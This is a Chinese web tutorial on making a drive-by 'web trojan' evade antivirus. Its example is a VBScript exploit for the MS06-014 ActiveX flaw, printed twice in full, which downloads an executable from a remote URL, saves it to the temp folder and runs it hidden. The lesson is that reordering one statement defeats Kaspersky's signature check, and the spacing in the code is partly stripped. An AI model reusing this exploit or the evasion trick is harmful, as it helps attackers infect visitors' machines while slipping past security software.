 减小字体  增大字体
网马免杀方法一般两种办法,一种是加密(微软自己的encode或者自己写加解密函数效果更好),另一种也是找特征码(字符或顺序)。
有朋友说网马被喀吧杀,不知道所措,现我以ms06014为例,以传小技。
原来的代码:
<html>
<scriptlanguage="VBScript">
onerrorresumenext
dl="http://www.baidu.com/go.exe"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Setx=df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
setS=df.createobject(str5,"")
S.type=1
str6="GET"
x.Openstr6,dl,False
x.Send
fname1="g0ld.com"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
fname1=F.BuildPath(tmp,fname1)
S.open
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
</script>
<head>
<title>Oh,mygod!</title>
</head><body>
<center>YouDOit!</center>
</body></html>
免杀后:
<html>
<scriptlanguage="VBScript">
onerrorresumenext
dl="http://www.baidu.com/go.exe"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Setx=df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
setS=df.createobject(str5,"")
S.type=1
str6="GET"
x.Openstr6,dl,False
x.Send
fname1="g0ld.com"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
</script>
<head>
<title>Oh,mygod!</title>
</head><body>
<center>YouDOit!</center>
</body></html>
大家注意观察,其实我就是将S.open语句移动到fname1=F.BuildPath(tmp,fname1)语句之前就实现了免杀,这正是挫败了喀吧的文件流特征码检测技术。
当然,在移动语句的时候,有必要注意语句在代码里的功能,不然会出错的
|
设为首页
加入收藏
发布作品
栏目导航
